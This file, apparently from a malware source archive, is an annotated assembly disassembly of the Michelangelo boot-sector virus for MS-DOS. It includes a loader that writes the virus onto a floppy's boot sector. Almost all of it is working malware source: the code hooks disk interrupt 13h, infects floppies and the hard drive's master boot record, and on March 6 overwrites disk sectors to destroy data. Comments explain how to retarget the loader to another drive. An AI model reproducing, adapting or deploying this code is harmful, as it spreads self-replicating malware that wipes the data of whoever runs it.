MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mich_ld.asm

387 lines
12 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;virus date 12/31/93
;disassembly of 1 version of the MICHElANGLO VIRUS
;michelangelo with a loader that will put the virus
;on a disk in drive b: will work correctly on 360 or 1.2meg disks
;loads orginal boot at last sector on those type of disks
;warning if computer date is march 6 on boot up with virus it will
;try to infect hard drive then write system info on
;to disks destroying the information on disk
;
;
;to load virus onto A drive alter the equ disk_dr to 00
int13_IP EQU 0004CH ;interrupt 13H location
int13_CS EQU 0004EH
MICHA SEGMENT BYTE
ASSUME CS:MICHA, DS:MICHA, ES:MICHA, SS:MICHA
;*****************************************************************************
;loader program
disk_dr equ 01 ;01 disk b 00 disk a
ORG 100H
START: MOV DL,DISK_DR
XOR SI,SI
XOR AX,AX ; RESET DRIVE
INT 13H
INC SI
AGAIN:
MOV AX,201H ;READ BOOT INTO BUFFER
MOV BX,OFFSET BUFF
MOV CX,01
MOV Dh,00
mov dl,disk_dr
INT 13H
JNC ALRIGHT
CMP SI,4
JA ERROR_WRITE
xor ax,ax
int 13h
JMP AGAIN
ALRIGHT:
MOV AX,301H ; WRITE BOOT TO
MOV Dh,01 ; LAST SECTOR OF
MOV CL,03 ; DIR
mov dl,disk_dr ; WHICH DISK
CMP BYTE PTR [BX+15H],0FDH ; TYPE OF DISK HIGH LOW
JZ LOW_DENSW ;
MOV CL,0EH
LOW_DENSW:
MOV [LOC_ORG_BOOT],CX ; SETUP VIRUS FOR TYPE
INT 13H ; DISK DRIVE
XOR AX,AX ; RESET DRIVE
INT 13H
MOV AX,0301H ;WRITE VIRUS
MOV BX,OFFSET M_START ; TO BOOT SECTOR
mov cx,01
mov Dh,00
mov dl,disk_dr
INT 13H
JNC FINI
ERROR_WRITE: MOV AH,9
MOV DX,OFFSET ERROR_MESS
INT 21H
FINI:
INT 20H ;EXIT
ERROR_MESS DB 'SORRY THERE IS A PROBLEM CHECK DRIVE DOOR'
DB 'OR TRY ANOTHER DISK',24H
BUFF DB 200H DUP (90) ;BUFFER FOR R/W OF DISK
;*************************************************************************
ORG 0413H
MEM_SIZE DW ? ;memory size in kilobytes
ORG 043FH
MOTOR_STATUS DB ? ;floppy disk motor status
;*************************************************************************
ORG 7C00H
M_START:
JMP START1
JMP_HI_MEM DW OFFSET HI_MEM - 7C00H
HIGH_SEG DW 0
DESTROY_CNT DB 02
LOC_ORG_BOOT DW 000EH ;HIGH DENS
OLD_INT13_IP DW 0
OLD_INT13_CS DW 0
VIR_INT13:
PUSH DS ; SAVE REGS
PUSH AX ;
OR DL,DL ; IS IT DISK DRIVE A
JNZ BIOS_INT13 ; NO
XOR AX,AX ;CHECK MOTOR STATUS
MOV DS,AX ; IS MOTOR RUNNING
TEST BYTE PTR DS:[MOTOR_STATUS],01 ;
JNZ BIOS_INT13 ; YES
POP AX ; LET
POP DS ; THE INT CALL
PUSHF ; GO BUT RETURN
CALL DWORD PTR CS:[OLD_INT13_IP - 7C00H] ; TO THE VIRUS
PUSHF ; ON RETURN
CALL INFECT_FLOPPY ; ATTEMPT INFECT
POPF ;ATTEMPTED INFECT RETURN
RETF 2 ;TO ORGINAL INT CALLER
BIOS_INT13:
POP AX ;LET BIOS HANDLE
POP DS ;THE CALL
JMP DWORD PTR CS:[OLD_INT13_IP - 7C00H] ;
INFECT_FLOPPY:
PUSH AX BX CX DX DS ES SI DI
PUSH CS
POP DS
PUSH CS
POP ES
MOV SI,04 ;RETRY COUNTER
READ_LP:
MOV AX,201H ; SETUP TO READ BOOT SECTOR
MOV BX,0200H ; TO END OF VIRUS
MOV CX,01 ;
XOR DX,DX ;
PUSHF ;FAKE A INT 13 CALL
CALL DWORD PTR [OLD_INT13_IP - 7C00H] ;
JNB NO_ERROR ;
TRY_AGAIN: ; IF ERROR
XOR AX,AX ; RESET DRIVE
PUSHF ; AND TRY AGAIN FOR
CALL DWORD PTR [OLD_INT13_IP - 7C00H] ; COUNT OF 4
DEC SI ; USING SI
JNZ READ_LP ;
JMP SHORT ERROR_EXIT ;PROBALY WRITE PROTECT
;GET OUT
NO_ERROR:
XOR SI,SI
CHK_FOR_INFECTION:
CLD ; CHECK FIRST 2 BYTES
LODSW ; TO VIRUS
CMP AX,[BX] ;
JNZ NOT_INFECTED_A ; NOT MATCH GO INFECT
LODSW ; TRY NEXT 2 BYTES
CMP AX,[BX+2] ;
JZ ERROR_EXIT ; MATCH LEAVE
NOT_INFECTED_A:
MOV AX,301H ; WRITE THE ORGINAL
MOV DH,01 ; BOOT TO THE NEW
MOV CL,03 ; LOCATION FIND
CMP BYTE PTR [BX+15H],0FDH ; NEW LOCATION
JZ LOW_DENS ; BY CHECKING IF 360
MOV CL,0EH ; OR 1.2
LOW_DENS:
MOV [LOC_ORG_BOOT - 7C00H],CX ;SAVE NEW LOCATION
PUSHF ; CALL TO
CALL DWORD PTR [OLD_INT13_IP - 7C00H] ; INT 13
JB ERROR_EXIT
UPDATE_END:
MOV SI,3BEH ; COPY LAST
MOV DI,1BEH ; 21 BYTES FROM
MOV CX,21H ; ORGINAL BOOT
CLD ; SECTOR
REPZ MOVSW ; TO VIRUS
MOV AX,0301H ; WRITE VIRUS
XOR BX,BX ; TO BOOT SECTOR
MOV CX,01 ; SECTOR 1
XOR DX,DX ; DRIVE A HEAD A
PUSHF ;INT 13
CALL DWORD PTR [OLD_INT13_IP - 7C00H] ;
ERROR_EXIT:
POP DI SI ES DS DX CX BX AX ; RESTORE REGS
RET ; LEAVE
START1:
XOR AX,AX ;WHERE WE JUMP TO
MOV DS,AX ;AT BOOT UP TIME
CLI ;SET UP STACK
MOV SS,AX ;
MOV AX,7C00H ;
MOV SP,AX ;
STI ;
PUSH DS ; SET UP FOR RETF
PUSH AX ; LATER
MOV AX,DS:[INT13_IP] ;SAVE OLD INT 13
mov [OLD_INT13_IP],AX ;VECTORS
MOV AX,DS:[INT13_CS] ;
MOV [OLD_INT13_CS],AX ;
MOV AX,DS:[MEM_SIZE] ;DEC MEMORY SIZE
DEC AX ;
DEC AX ;
MOV DS:[MEM_SIZE],AX ;
MOV CL,06H ;CONVERT SIZE TO
SHL AX,CL ;SEGMENT ADDRESS
MOV ES,AX ;
MOV [HIGH_SEG],AX ;SAVE ADDRESS
MOV AX, OFFSET VIR_INT13 - 7C00H ; SET UP INT 13 TO
MOV DS:[INT13_IP],AX ; POINT TO US
MOV DS:[INT13_CS],ES ;
MOV CX,1BEH ;OFFSET END_VIR - OFFSET M_START
MOV SI,7C00H ;COPY VIRAL CODE UP IN MEMORY
XOR DI,DI ;
CLD ;
REPZ MOVSB ;
JMP DWORD PTR CS:[JMP_HI_MEM] ;GO THERE
HI_MEM:
XOR AX,AX ; RESET DRIVE
MOV ES,AX ; SET UP ES SEGMENT TO 0
INT 13H ;
PUSH CS ;DS POINTS HERE
POP DS ;
MOV AX,0201H ;READ ORGINAL BOOT
MOV BX,7C00H ;
MOV CX,[LOC_ORG_BOOT - 7C00H] ;
CMP CX,0007H ;
JNZ FLOPPY
H_DRIVE:
MOV DX,0080H ; READ ORGINAL
INT 13H ; BOOT FROM HARD DRIVE
JMP SHORT GET_DATE ; CHECK DATE
FLOPPY:
MOV CX,[LOC_ORG_BOOT - 7C00H] ;READ ORGINAL
MOV DX,100H ;BOOT FROM FLOPPY
INT 13H ;
JB GET_DATE ; IF ERROR CHECK DATE
PUSH CS
POP ES
HD_INFECT:
MOV AX,0201H ;READ 1 SECTOR
mov bx,0200h ;TO BUFFER
mov cx,0001h ;SECTOR 1
MOV DX,0080H ;HEAD 0 DISK C:
INT 13H
JB GET_DATE ;IF ERROR
CHK_BOOT:
XOR SI,SI
CLD
LODSW
CMP AX,[BX]
JNE NOT_INFECTED
LODSW
CMP AX,[BX+2]
JNE NOT_INFECTED
GET_DATE:
XOR CX,CX ;GET DATE
MOV AH,04 ;
INT 1AH ;
CMP DX,0306H ;IS IT MARCH 6
JZ TRASH_DISK ;
RETF ;BIOS_BOOT
;******************************************************************
; TRASH DISK ROUTTINE SIMPLY WRITE MEMORY DATA FROM
; 5000:5000 TO THE DISKS FIRST 9 SECTORS UNTIL AN ERROR HITS IT
;
TRASH_DISK:
XOR DX,DX
MOV CX,1
D_LOOP:
MOV AX,0309H ;WRITE DISK 9 SECTORS
MOV SI,[LOC_ORG_BOOT - 7C00H]
CMP SI,+03
JE FLPPY_DISK
MOV AL,0EH
CMP SI,+0EH
JE FLPPY_DISK
MOV DL,80H
MOV BYTE PTR [DESTROY_CNT - 7C00H],04
MOV AL,11H
FLPPY_DISK:
MOV BX,5000H
MOV ES,BX
INT 13H
JNB NO_ERROR_DESTROY
;RESET_DISK
XOR AH,AH
INT 13H
NO_ERROR_DESTROY:
INC DH
CMP DH,[DESTROY_CNT - 7C00H]
JB D_LOOP
XOR DH,DH
INC CH
JMP SHORT D_LOOP
;*********************************************************************
NOT_INFECTED:
;HD ; INFECT HD
MOV CX,0007 ; BY WRITING
MOV [LOC_ORG_BOOT - 7C00H],CX ; ORGINAL BOOT
MOV AX,0301H ; TO HEAD 0 SECTOR 7
MOV DX,0080H ; TRACK 0
INT 13H ;
JB GET_DATE ;
;UPDATE_PARTION:
MOV SI,03BEH ;IMPORTANT TO UPDATE
MOV DI,01BEH ;PARTION TABLE
MOV CX,21H ;
REPZ MOVSW ;
MOV AX,0301H ;NOW WRITE VIRUS
XOR BX,BX ;TO HARD DRIVE
INC CL ;
INT 13H
JMP SHORT GET_DATE
;THE REST IS WHERE THE PARTION TABLE INFO GOES OR END OF FLOPPY DISK
;BOOT SECTOR GOES
ORG 7DBEH
END_VIR:
DB 00
ORG 7DFEH
BOOT_ID DB 55H,0AAH
micha ENDS
END START